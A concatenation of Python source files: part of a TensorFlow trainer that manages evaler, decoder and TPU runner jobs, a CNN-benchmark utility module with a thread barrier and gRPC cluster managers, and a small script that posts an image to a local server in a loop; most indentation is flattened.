    # the indices of entries that have not been examined yet.
    for i in reversed(range(len(proto.value))):
      if proto.value[i].WhichOneof('value') == 'simple_value':
        del proto.value[i]
    return proto.SerializeToString()
def _EvalOnce(self, sess, path):
"""Runs evaluation for a batch of samples.
Args:
sess: the tf Session.
path: checkpoint path.
"""
if not FLAGS.evaler_in_same_address_as_controller:
self.checkpointer.RestoreFromPath(sess, path)
global_step = sess.run(py_utils.GetGlobalStep())
# Save any additional information to disk before evaluation.
if self._export:
self._task.Export(path)
# Check after how many steps checkpoint got saved.
# And decide whether to run an evaluation.
if global_step < self._task.params.eval.start_eval_after:
return
if self._task.input.params.resettable:
tf.logging.info('Resetting input_generator.')
self._task.input_generator.Reset(sess)
metrics_dict = {
name: metrics.AverageMetric() for name in self._task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
samples_per_summary = self._task.params.eval.samples_per_summary
if samples_per_summary == 0:
assert self._task.input.params.resettable
while samples_per_summary == 0 or (num_samples_metric.total_value <
samples_per_summary):
try:
is_first_loop = num_samples_metric.total_value == 0
# NOTE: We intentionally do not let FProp generate scalar summaries by
# default, because evaler calls FProp multiple times for each
# checkpoint. Multiple summaries at the same step is often confusing.
# Instead, models should update eval_metrics and generate aggregate
# summaries. Other types of summaries (images, audio etc.) will be
# generated for the first eval batch.
if self._summary_op is not None and is_first_loop:
ans, summaries = sess.run([self._task.eval_metrics, self._summary_op])
summaries = self._RemoveScalarSummaries(summaries)
# Add non-scalar summaries only for the first batch of data.
self._summary_writer.add_summary(summaries, global_step)
self._summary_writer.flush()
else:
ans = sess.run(self._task.eval_metrics)
for name, (value, weight) in ans.items():
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value, samples_per_summary)
except tf.errors.OutOfRangeError:
if not self._task.input.params.resettable:
raise
break
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
self._RunTF2SummaryOps(sess)
summaries = {k: v.Summary(k) for k, v in metrics_dict.items()}
summaries['total_samples'] = metrics.CreateScalarSummary(
'total_samples', num_samples_metric.total_value)
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step,
summaries,
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
    # Get merged summaries for input data stats logged by the task's input
# generator and write summaries for the stats.
if self._task.input.merged_input_data_summary_op is not None:
input_stats_summary_str = sess.run(
self._task.input.merged_input_data_summary_op)
self._WriteInputDataStatSummaries(input_stats_summary_str, global_step)
if self._should_report_metrics:
tf.logging.info('Reporting eval measure for step %d.' % global_step)
self._trial.ReportEvalMeasure(global_step, metrics_dict, path)
Decoder = trainer_impl.Decoder
GetDecoderDir = trainer_impl.GetDecoderDir
def _GetClusterSpecDict():
"""Parses the cluster_spec flag and returns a dict."""
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
raise ValueError(f'Invalid job specification: {job_spec}')
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
return cluster_spec_dict
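# Hedged illustration (hostnames and ports are made up): with
#   --cluster_spec='trainer=host1:1231,host2:1232@ps=host3:1233'
# _GetClusterSpecDict() returns
#   {'trainer': ['host1:1231', 'host2:1232'], 'ps': ['host3:1233']}.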
class RunnerManager:
"""Helper class for managing runners."""
  # This is a hack so these classes can be overridden with internal
# non-public implementations.
# pylint: disable=invalid-name
inference_graph_exporter = inference_graph_exporter
model_registry = model_registry
Controller = Controller
Trainer = Trainer
TrainerTpu = TrainerTpu
Evaler = Evaler
Decoder = Decoder
ExecutorTpu = executor.ExecutorTpu
# pylint: enable=invalid-name
def __init__(self, model):
self._model_name = model
def MaybeLaunchTensorFlow(self):
"""Starts TF machinery in this process."""
if FLAGS.run_locally or FLAGS.tpu:
return
tf.logging.info('Launching tensorflow.')
target = FLAGS.tf_master
if not target.startswith('localhost'):
# E.g., trainer_client is configured w/ FLAGS.tf_master pointing to
# another job. In that case, start a local server.
cluster_spec_dict = _GetClusterSpecDict()
self._tf_server = tf.distribute.Server(
tf.train.ClusterSpec(cluster_spec_dict),
job_name=FLAGS.job,
task_index=FLAGS.task)
target = self._tf_server.target
if not FLAGS.tf_master:
FLAGS.tf_master = target
with tf.Session(target).as_default():
value = (tf.constant(1.) + tf.constant(1.)).eval()
assert value == 2.0, 'Something is really wrong.'
tf.logging.info('Launched tensorflow.')
def GetExecutorParams(self):
"""Get the params needed to instantiate the ExecutorTpu.
Returns:
Tuple (dict, params):
- ps_params_dict: high_level task_name -> ProgramScheduleParams
- train_cfg: Either a SingleTaskModelParams or MultiTaskModelParams.
"""
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, 'executor_tpu')
ps_params_dict, train_cfg = executor.GetExecutorParams(
self._model_name, cluster.params, self.model_registry)
return ps_params_dict, train_cfg
def GetParamsForDataset(self, job_name, dataset_name):
"""Returns params for job `job_name` on the dataset `dataset_name`."""
# Get the current cluster and update its params from flags.
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, job_name)
with cluster_factory.Cluster(cluster.params):
try:
cfg = self.model_registry.GetParams(self._model_name, dataset_name)
except base_model_params.DatasetError as e:
dataset_name_retry = dataset_name.title()
tf.logging.warning(
'Exception configuring dataset %s, retrying as %s: %s',
dataset_name, dataset_name_retry, e)
cfg = self.model_registry.GetParams(self._model_name,
dataset_name_retry)
tf.logging.warning('Succeeded after retrying as %s.' %
dataset_name_retry)
cfg.cluster = cluster.params
# Updates a few params based on flags.
if FLAGS.enqueue_max_steps is not None:
cfg.train.enqueue_max_steps = FLAGS.enqueue_max_steps
if FLAGS.saver_max_to_keep is not None:
cfg.train.save_max_to_keep = FLAGS.saver_max_to_keep
if FLAGS.saver_keep_checkpoint_every_n_hours is not None:
cfg.train.save_keep_checkpoint_every_n_hours = FLAGS.saver_keep_checkpoint_every_n_hours
return cfg
def MaybeConfigRunDistributed(self):
"""If given a `FLAGS.cluster_spec`, update flags for running distributed."""
if not FLAGS.cluster_spec:
return
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = _GetClusterSpecDict()
if FLAGS.job == 'trainer_client':
FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task]
for job in cluster_spec_dict:
if job.startswith('decoder_'):
assert len(job_specs) == 1, 'Decoder jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.decoder_job = '/job:%s' % job
FLAGS.decoder_replicas = 1
if job.startswith('evaler_'):
assert len(job_specs) == 1, 'Evaler jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.evaler_job = '/job:%s' % job
FLAGS.evaler_replicas = 1
if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client',
'worker', 'executor_tpu'):
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = len(cluster_spec_dict['worker'])
FLAGS.ps_job = '/job:worker'
FLAGS.ps_replicas = FLAGS.worker_replicas
if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'):
FLAGS.worker_job = '/job:trainer'
FLAGS.worker_replicas = len(cluster_spec_dict['trainer'])
FLAGS.ps_job = '/job:ps'
FLAGS.ps_replicas = len(cluster_spec_dict['ps'])
def MaybeConfigCloudTpu(self):
"""If given `FLAGS.tpu`, update flags for running on a Cloud TPU."""
if not FLAGS.tpu:
return
if not FLAGS.job:
FLAGS.job = 'trainer_client'
if FLAGS.job not in ('trainer_client', 'executor_tpu'):
raise ValueError('Only trainer_client and executor_tpu jobs are '
'supported on TPU.')
cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
tpu=FLAGS.tpu,
project=FLAGS.gcp_project,
zone=FLAGS.tpu_zone,
job_name=FLAGS.job)
cluster_spec_dict = cluster_resolver.cluster_spec().as_dict()
FLAGS.mode = 'sync'
FLAGS.tf_master = cluster_resolver.master()
FLAGS.worker_job = '/job:{}'.format(FLAGS.job)
FLAGS.worker_replicas = 1
FLAGS.worker_num_tpu_hosts = len(cluster_spec_dict[FLAGS.job])
FLAGS.worker_tpus = (
cluster_resolver.num_accelerators()['TPU'] * FLAGS.worker_num_tpu_hosts)
FLAGS.ps_job = FLAGS.worker_job
if FLAGS.job == 'trainer_client':
FLAGS.ps_replicas = FLAGS.worker_replicas
FLAGS.cluster_spec = ('@'.join('{}={}'.format(job, ','.join(hosts))
for job, hosts in cluster_spec_dict.items()))
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
FLAGS.checkpoint_in_trainer_tpu = True
def UpdateClusterParamsFromFlags(self, cluster, job_name):
"""Update `cluster` with a training cluster configuration from flags."""
cluster.mode = FLAGS.mode
cluster.job = job_name
cluster.task = FLAGS.task
cluster.do_eval = job_name in ['evaler', 'decoder']
cluster.logdir = FLAGS.logdir
cluster.controller.name = FLAGS.controller_job
cluster.controller.gpus_per_replica = FLAGS.controller_gpus
cluster.worker.name = FLAGS.worker_job
cluster.worker.replicas = FLAGS.worker_replicas
cluster.worker.gpus_per_replica = FLAGS.worker_gpus
cluster.worker.tpus_per_replica = FLAGS.worker_tpus
cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts
cluster.worker.devices_per_split = FLAGS.worker_split_size
if FLAGS.additional_worker_jobs:
for additional_job in FLAGS.additional_worker_jobs:
cluster.worker.additional_worker_names.append(additional_job)
if FLAGS.tpu:
job_name = cluster.worker.name.replace('/job:', '', 1)
worker_hosts = _GetClusterSpecDict()[job_name]
if FLAGS.additional_worker_jobs:
for additional_job in cluster.worker.additional_worker_names:
additional_job_name = additional_job.replace('/job:', '', 1)
worker_hosts.extend(_GetClusterSpecDict()[additional_job_name])
cluster.worker.targets = ','.join(
'grpc://{}'.format(host) for host in worker_hosts)
cluster.ps.name = FLAGS.ps_job
cluster.ps.replicas = FLAGS.ps_replicas
cluster.ps.gpus_per_replica = FLAGS.ps_gpus
cluster.input.name = FLAGS.input_job
cluster.input.replicas = FLAGS.input_replicas
cluster.input.targets = FLAGS.input_targets
cluster.evaler.name = FLAGS.evaler_job
cluster.evaler.replicas = FLAGS.evaler_replicas
cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus
cluster.decoder.name = FLAGS.decoder_job
cluster.decoder.replicas = FLAGS.decoder_replicas
cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus
cluster.tf_data_service_address = FLAGS.tf_data_service_address
cluster.add_summary = FLAGS.add_summary
cluster.reporting_job = FLAGS.vizier_reporting_job
def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial):
"""Create a runner."""
evaler_job_name_prefix = 'evaler_'
decoder_job_name_prefix = 'decoder_'
tf.logging.info('Job %s start', job)
common_args = (model_task_name, logdir, tf_master, trial)
if job == 'controller':
cfg = self.GetParamsForDataset('controller', 'Train')
cfg.cluster.xla_device = 'cpu'
return self.Controller(cfg, *common_args)
elif job == 'trainer':
cfg = self.GetParamsForDataset('trainer', 'Train')
return self.Trainer(cfg, *common_args)
elif job == 'trainer_client':
cfg = self.GetParamsForDataset('trainer_client', 'Train')
if py_utils.use_tpu():
cfg.cluster.xla_device = 'tpu'
return self.TrainerTpu(cfg, *common_args)
else:
return self.Trainer(cfg, *common_args)
elif job.startswith(evaler_job_name_prefix):
dataset_name = job[len(evaler_job_name_prefix):]
cfg = self.GetParamsForDataset('evaler', dataset_name)
return self.Evaler(dataset_name.lower(), cfg, *common_args)
elif job.startswith(decoder_job_name_prefix):
dataset_name = job[len(decoder_job_name_prefix):]
cfg = self.GetParamsForDataset('decoder', dataset_name)
return self.Decoder(dataset_name.lower(), cfg, *common_args)
elif job in ('ps', 'worker', 'input'):
self._tf_server.join()
elif job == 'executor_tpu':
ps_cfg_dict, train_cfg = self.GetExecutorParams()
return self.ExecutorTpu(train_cfg, ps_cfg_dict, *common_args)
else:
raise ValueError('job %s is not supported' % job)
def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()):
"""Creates a list of runners based on `FLAGS.mode`.
Args:
jobs: a list of runner jobs.
logdir: the directory used for logging, usually on CNS.
trial: optional `Trial` object, used for reporting measures and early
stopping.
Returns:
A list of `.BaseRunner`, one per job in `jobs`.
"""
runners = []
is_training = 'trainer' in jobs or 'trainer_client' in jobs
for j in jobs:
tf_master = FLAGS.tf_master
# Ensure that decoder or evaler threads do not clobber variables being
# updated by trainer by forcing them to use independent sessions.
if (is_training and (j.startswith('decoder') or j.startswith('evaler'))):
tf_master = ''
runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master,
trial)
runners.append(runner)
return runners
def StartRunners(self, runners):
"""Runs `runners` in parallel threads.
Returns when all of them finish.
Args:
runners: a list of `.BaseRunner`.
Returns:
None.
"""
threads = []
tf.logging.info('Starting runners')
for runner in runners:
runner_class_name = str(runner)
t = threading.Thread(target=runner.Start, name=runner_class_name)
t.daemon = True
t.start()
threads.append(t)
if runner.enqueue_ops:
tf.logging.info('Total num runner.enqueue_ops: %d',
len(runner.enqueue_ops))
for i, enqueue_op in enumerate(runner.enqueue_ops):
def StartEnqueue(runner, op):
tf.logging.info('Starting enqueue op %s', op.name)
return lambda: runner.StartEnqueueOp(op)
enqueue_name = '%s-enqueue-%d' % (runner_class_name, i)
tq = threading.Thread(
target=StartEnqueue(runner, enqueue_op), name=enqueue_name)
tq.start()
threads.append(tq)
tf.logging.info('Waiting for runners to finish...')
for t in threads:
tf.logging.info('Waiting for thread to finish: %s' % t.name)
while True:
t.join(1)
if not t.is_alive():
break
tf.logging.info('All runners done.')
def RunTrial(self, job, logdir, trial):
"""A wrapper function for running a trial."""
# Run each job in separate process/task
# TODO(rpang): add support for running evaler_test and decoder.
self.StartRunners(self.CreateRunners([job], logdir, trial))
def MaybeConfigRunLocally(self):
"""Update flags if configured to run locally."""
if not FLAGS.run_locally:
# Do nothing
return
FLAGS.tf_master = tf.distribute.Server.create_local_server().target
if not FLAGS.mode:
FLAGS.mode = 'sync'
if not FLAGS.job:
if FLAGS.run_locally == 'tpu':
FLAGS.job = 'trainer_client'
elif FLAGS.mode == 'async':
FLAGS.job = 'controller,trainer'
else:
FLAGS.job = 'controller,trainer_client'
FLAGS.task = 0
local_job = '/job:localhost'
FLAGS.controller_job = local_job
FLAGS.worker_job = local_job
FLAGS.worker_replicas = 1
if FLAGS.run_locally == 'gpu':
if not FLAGS.worker_gpus:
FLAGS.worker_gpus = 1
else:
FLAGS.worker_gpus = 0
if FLAGS.run_locally == 'tpu':
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
else:
FLAGS.worker_tpus = 0
if not FLAGS.worker_split_size:
FLAGS.worker_split_size = 1
FLAGS.ps_job = local_job
FLAGS.ps_replicas = 1
FLAGS.ps_gpus = 0
FLAGS.input_job = local_job
FLAGS.input_replicas = 0
FLAGS.evaler_job = local_job
FLAGS.evaler_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.evaler_gpus = 1
else:
FLAGS.evaler_gpus = 0
FLAGS.decoder_job = local_job
FLAGS.decoder_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.decoder_gpus = 1
else:
FLAGS.decoder_gpus = 0
def InspectParams(self):
r"""Print out all the params.
An example to run this mode:
bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=inspect_params --logdir=/tmp/lenet5 \
--run_locally=cpu
"""
FLAGS.mode = 'sync'
cls = self.model_registry.GetClass(self._model_name)
tf.io.gfile.makedirs(FLAGS.logdir)
for dataset in datasets.GetDatasets(cls):
p = self.GetParamsForDataset('controller', dataset)
outf = os.path.join(FLAGS.logdir, dataset.lower() + '-params.txt')
tf.logging.info('Write all params for {} to {}'.format(dataset, outf))
with tf.io.gfile.GFile(outf, 'w') as f:
f.write(p.ToText())
def InspectModel(self):
"""Prints out model analysis for the model."""
FLAGS.mode = 'sync'
p = self.GetParamsForDataset('controller', 'Train')
c = cluster_factory.Cluster(p.cluster)
model_part_regex = FLAGS.inspect_model_part_regex
part_pattern = None
if model_part_regex:
part_pattern = {}
for pat_str in model_part_regex:
first_colon = pat_str.find(':')
if first_colon < 0:
msg = f'Cannot understand --inspect_model_part_regex={pat_str}.'
raise ValueError(msg)
name = pat_str[:first_colon]
pattern = pat_str[first_colon + 1:]
part_pattern[name] = pattern
with tf.Graph().as_default(), c, tf.device(c.GetPlacer()):
analysis, _ = summary_utils.ModelAnalysis(
p.Instantiate(),
topn=FLAGS.inspect_model_topn,
part_pattern=part_pattern)
print(analysis)
def InspectDatasets(self):
"""Prints out datasets configured for the model."""
cls = self.model_registry.GetClass(self._model_name)
print(','.join([dataset.lower() for dataset in datasets.GetDatasets(cls)]))
def InspectDecoder(self):
"""Prints out datasets configured for the decoder."""
cls = self.model_registry.GetClass(self._model_name)
params = cls()
has_decoder = False
if issubclass(cls, base_model_params.SingleTaskModelParams):
has_decoder = params.Task(
).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics
else:
for _, task_param in params.Model().task_params.IterParams():
has_decoder |= (
task_param.cls.CreateDecoderMetrics !=
base_model.BaseTask.CreateDecoderMetrics)
if has_decoder:
# We assume that the proper decoder is implemented.
self.InspectDatasets()
else:
print('')
def SetModelName(self, model_name):
"""Sets the model name."""
self._model_name = model_name
def WriteInferenceGraph(self, cfg=None, prune_graph=True):
"""Generates the inference graphs for a given model.
Args:
cfg: Full `~.hyperparams.Params` for the model class. If present,
this cfg will be used instead of retrieving from model_registry.
prune_graph: If true, prune the graph to just the parts we need.
Returns:
InferenceGraph proto for cpu.
"""
inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs')
tf.io.gfile.makedirs(inference_graph_dir)
tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir)
if not cfg:
cfg = self.model_registry.GetParams(self._model_name,
FLAGS.inference_dataset_name)
task_names = [FLAGS.model_task_name]
if (issubclass(cfg.cls, base_model.MultiTaskModel) and
not FLAGS.model_task_name):
task_names = base_model.MultiTaskModel.TaskNames(cfg)
inference_graph_proto = None
if FLAGS.inference_graph_filename:
# Custom inference graph.
for task_name in task_names:
filename_prefix = FLAGS.inference_graph_filename
if task_name:
filename_prefix = '%s_inference' % task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
device = ''
var_options = None
if FLAGS.inference_graph_device == 'tpu':
device = 'tpu'
var_options = 'ON_DEVICE'
device_options = inference_graph_exporter.InferenceDeviceOptions(
device=device,
retain_device_placement=False,
var_options=var_options,
gen_init_op=FLAGS.inference_gen_tpu_init_op,
dtype_override=None,
fprop_dtype_override=None)
inference_graph_proto = (
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=task_name,
device_options=device_options,
export_path=filename_prefix + '.pbtxt',
random_seed=FLAGS.inference_graph_random_seed,
prune_graph=prune_graph))
else:
for task_name in task_names:
filename_prefix = 'inference'
if task_name:
filename_prefix = '%s_inference' % task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
# Standard inference graph.
try:
inference_graph_proto = (
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=task_name,
export_path=filename_prefix + '.pbtxt',
random_seed=FLAGS.inference_graph_random_seed,
prune_graph=prune_graph))
except NotImplementedError as e:
tf.logging.error('Cannot write inference graph: %s', e)
# TPU inference graph. Not all models support it so fail silently.
try:
device_options = self.inference_graph_exporter.InferenceDeviceOptions(
device='tpu',
retain_device_placement=False,
var_options='ON_DEVICE',
gen_init_op=FLAGS.inference_gen_tpu_init_op,
dtype_override=None,
fprop_dtype_override=None)
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=task_name,
device_options=device_options,
export_path=filename_prefix + '_tpu.pbtxt',
random_seed=FLAGS.inference_graph_random_seed,
prune_graph=prune_graph)
except Exception as e: # pylint: disable=broad-except
tf.logging.error('Error exporting TPU inference graph: %s' % e)
if FLAGS.graph_def_filename and inference_graph_proto:
for graph_def_filename in FLAGS.graph_def_filename:
tf.logging.info('Writing graphdef: %s', graph_def_filename)
dir_path = os.path.dirname(graph_def_filename)
if (not tf.io.gfile.exists(dir_path) or
not tf.io.gfile.isdir(dir_path)):
tf.io.gfile.makedirs(dir_path)
with tf.io.gfile.GFile(graph_def_filename, 'w') as f:
f.write(text_format.MessageToString(inference_graph_proto.graph_def))
return inference_graph_proto
def RunEvalerOnce(self):
"""Run once evaler."""
m = re.match(r'evaler_once_([^_@]+)@(\d+)', FLAGS.job)
dataset_name, ckpt_id = m.group(1), int(m.group(2))
cfg = self.GetParamsForDataset('evaler', dataset_name)
evaler = self.Evaler(dataset_name.lower(), cfg, FLAGS.model_task_name,
FLAGS.logdir, FLAGS.tf_master)
evaler.EvalCheckpoint(ckpt_id)
def Start(self):
"""Start the process."""
tf.logging.set_verbosity(tf.logging.INFO)
tf.logging.info('tf_api_version: %s', tf.summarize_tf2_status())
if FLAGS.mode == 'inspect_params':
self.InspectParams()
return
if FLAGS.mode == 'inspect_model':
self.InspectModel()
return
if FLAGS.mode == 'inspect_evaler':
self.InspectDatasets()
return
if FLAGS.mode == 'inspect_decoder':
self.InspectDecoder()
return
if FLAGS.mode == 'write_inference_graph':
self.WriteInferenceGraph()
return
if FLAGS.mode == 'shell':
_StartShell(locals())
return
assert FLAGS.mode in ['sync', 'async']
self.MaybeConfigRunLocally()
self.MaybeConfigRunDistributed()
self.MaybeConfigCloudTpu()
self.MaybeLaunchTensorFlow()
if FLAGS.job.startswith('evaler_once_'):
# E.g., trainer --model=foo.bar.Model --logdir=...
# --run_locally=cpu --mode=sync --job=evaler_once_test@65200
self.RunEvalerOnce()
return
self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir))
def main(unused_argv):
RunnerManager(FLAGS.model).Start()
if __name__ == '__main__':
py_utils.SetEagerMode(False)
tf.flags.mark_flag_as_required('model')
FLAGS(sys.argv, known_only=True)
if FLAGS.disable_tf2:
tf.disable_v2_behavior()
model_imports.ImportParams(FLAGS.model)
FLAGS.unparse_flags()
tf.app.run(main)
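# Illustrative launch commands (model name, logdir and flag values are examples taken
# from the docstrings above, not a definitive recipe):
#   bazel-bin/lingvo/trainer --logtostderr --model=image.mnist.LeNet5 \
#     --mode=sync --logdir=/tmp/lenet5 --run_locally=cpu
#   # one-off evaluation of checkpoint 65200 on the "test" dataset:
#   bazel-bin/lingvo/trainer --model=image.mnist.LeNet5 --logdir=/tmp/lenet5 \
#     --run_locally=cpu --mode=sync --job=evaler_once_test@65200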
|
cnn_util.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for CNN benchmarks."""
from __future__ import print_function
import sys
import threading
import numpy as np
import tensorflow as tf
import json
CLUSTER_FILE = 'cluster.cfg'
def tensorflow_version_tuple():
v = tf.__version__
major, minor, patch = v.split('.')
return (int(major), int(minor), patch)
def tensorflow_version():
vt = tensorflow_version_tuple()
return vt[0] * 1000 + vt[1]
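# For example, TF 1.12.x gives (1, 12, ...) above, which encodes here as 1 * 1000 + 12 = 1012.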
def log_fn(log):
print(log)
def roll_numpy_batches(array, batch_size, shift_ratio):
"""Moves a proportion of batches from start to the end of the array.
This function moves a proportion of batches, specified by `shift_ratio`, from
the start of the array to the end. The number of batches moved is rounded
down to the nearest integer. For example,
```
roll_numpy_batches([1, 2, 3, 4, 5, 6], 2, 0.34) == [3, 4, 5, 6, 1, 2]
```
Args:
array: A Numpy array whose first dimension is the batch dimension.
batch_size: The batch size.
shift_ratio: Proportion of batches to move from the start of the array to
the end of the array.
Returns:
A new Numpy array, with a proportion of the batches at the start of `array`
moved to the end.
"""
num_items = array.shape[0]
assert num_items % batch_size == 0
num_batches = num_items // batch_size
starting_batch = int(num_batches * shift_ratio)
starting_item = starting_batch * batch_size
return np.roll(array, -starting_item, axis=0)
# For Python 2.7 compatibility, we do not use threading.Barrier.
class Barrier(object):
"""Implements a lightweight Barrier.
Useful for synchronizing a fixed number of threads at known synchronization
points. Threads block on 'wait()' and simultaneously return once they have
all made that call.
# Implementation adapted from boost/thread/barrier.hpp
"""
def __init__(self, parties):
"""Create a barrier, initialised to 'parties' threads."""
self.cond = threading.Condition(threading.Lock())
self.parties = parties
# Indicates the number of waiting parties.
self.waiting = 0
# generation is needed to deal with spurious wakeups. If self.cond.wait()
# wakes up for other reasons, generation will force it go back to wait().
self.generation = 0
self.broken = False
def wait(self):
"""Wait for the barrier."""
with self.cond:
# Check if the barrier has been disabled or not.
if self.broken:
return
gen = self.generation
self.waiting += 1
if self.waiting == self.parties:
self.waiting = 0
self.generation += 1
self.cond.notify_all()
# loop because of spurious wakeups
while gen == self.generation:
self.cond.wait()
# TODO(huangyp): Remove this method once we find a way to know which step
# is the last barrier.
def abort(self):
"""Clear existing barrier and disable this barrier."""
with self.cond:
if self.waiting > 0:
self.generation += 1
self.cond.notify_all()
self.broken = True
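# A minimal usage sketch for Barrier (illustrative only; the thread count and loop body
# are hypothetical): each thread calls wait() at the end of every step, and all threads
# proceed together once the last one arrives.
#
#   barrier = Barrier(4)
#   def step_fn():
#     for _ in range(10):
#       ...  # per-thread work for one step
#       barrier.wait()
#   workers = [threading.Thread(target=step_fn) for _ in range(4)]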
class ImageProducer(object):
"""An image producer that puts images into a staging area periodically.
This class is useful for periodically running a set of ops, `put_ops` on a
different thread every `batch_group_size` steps.
The notify_image_consumption() method is used to increment an internal counter
so that every `batch_group_size` times it is called, `put_ops` is executed. A
barrier is placed so that notify_image_consumption() will block until
the previous call to `put_ops` has been executed.
The start() method is used to start the thread that runs `put_ops`.
The done() method waits until the last put_ops is executed and stops the
thread.
The purpose of this class is to fill an image input pipeline every
`batch_group_size` steps. Suppose `put_ops` supplies `batch_group_size` images
to the input pipeline when run, and that every step, 1 batch of images is
consumed. Then, by calling notify_image_consumption() every step, images are
supplied to the input pipeline at the same rate as they are consumed.
Example usage:
```
put_ops = ... # Enqueues `batch_group_size` batches to a StagingArea
get_op = ... # Dequeues 1 batch, and does some operations on it
batch_group_size = 4
with tf.Session() as sess:
image_producer = cnn_util.ImageProducer(sess, put_ops, batch_group_size, use_python32_barrier=False)
image_producer.start()
for _ in range(100):
sess.run(get_op)
image_producer.notify_image_consumption()
```
"""
def __init__(self, sess, put_ops, batch_group_size, use_python32_barrier):
self.sess = sess
self.num_gets = 0
self.put_ops = put_ops
self.batch_group_size = batch_group_size
self.done_event = threading.Event()
if (use_python32_barrier and
sys.version_info[0] == 3 and sys.version_info[1] >= 2):
self.put_barrier = threading.Barrier(2)
else:
self.put_barrier = Barrier(2)
def _should_put(self):
return (self.num_gets + 1) % self.batch_group_size == 0
def done(self):
"""Stop the image producer."""
self.done_event.set()
self.put_barrier.abort()
self.thread.join()
def start(self):
"""Start the image producer."""
self.sess.run([self.put_ops])
self.thread = threading.Thread(target=self._loop_producer)
# Set daemon to true to allow Ctrl + C to terminate all threads.
self.thread.daemon = True
self.thread.start()
def notify_image_consumption(self):
"""Increment the counter of image_producer by 1.
This should only be called by the main thread that consumes images and runs
the model computation. One batch of images should be consumed between
calling start() and the first call to this method. Then, one batch of images
should be consumed between any two successive calls to this method.
"""
if self._should_put():
self.put_barrier.wait()
self.num_gets += 1
def _loop_producer(self):
while not self.done_event.is_set():
self.sess.run([self.put_ops])
self.put_barrier.wait()
class BaseClusterManager(object):
"""The manager for the cluster of servers running the benchmark."""
def __init__(self, params):
"""
worker_hosts = params.worker_hosts.split(',')
ps_hosts = params.ps_hosts.split(',') if params.ps_hosts else []
cluster = {'worker': worker_hosts}
if ps_hosts:
cluster['ps'] = ps_hosts
"""
with open(CLUSTER_FILE) as f:
cluster = json.load(f)
self._cluster_spec = tf.train.ClusterSpec(cluster)
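# A sketch of the expected CLUSTER_FILE contents, assuming the same job -> hosts dict
# that tf.train.ClusterSpec accepts (mirrors the commented-out construction above);
# the addresses are hypothetical:
# {
#   "worker": ["10.0.0.1:2222", "10.0.0.2:2222"],
#   "ps": ["10.0.0.3:2222"]
# }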
def get_target(self):
"""Returns a target to be passed to tf.Session()."""
raise NotImplementedError('get_target must be implemented by subclass')
def join_server(self):
raise NotImplementedError('join must be implemented by subclass')
def get_cluster_spec(self):
return self._cluster_spec
def num_workers(self):
return len(self._cluster_spec.job_tasks('worker'))
def num_ps(self):
if 'ps' in self._cluster_spec.jobs:
return len(self._cluster_spec.job_tasks('ps'))
else:
return 0
class GrpcClusterManager(BaseClusterManager):
"""A cluster manager for a cluster networked with gRPC."""
def __init__(self, params, config_proto):
super(GrpcClusterManager, self).__init__(params)
if params.job_name == 'controller':
self._target = 'grpc://%s' % self._cluster_spec.job_tasks('worker')[0]
else:
self._server = tf.train.Server(self._cluster_spec,
job_name=params.job_name,
task_index=params.task_index,
config=config_proto,
protocol=params.server_protocol)
self._target = self._server.target
def get_target(self):
return self._target
def join_server(self):
return self._server.join()
|
send_request.py
|
import requests
from threading import Thread
with open('image.jpeg', 'rb') as f:
FILE = f.read()
# send request to http://127.0.0.1:8000
def send_request(host, port):
for _ in range(100):
r = requests.post(f"http://{host}:{port}", data={'file': FILE})
print(f"Receive response: '{r.text}' from {r.url}")
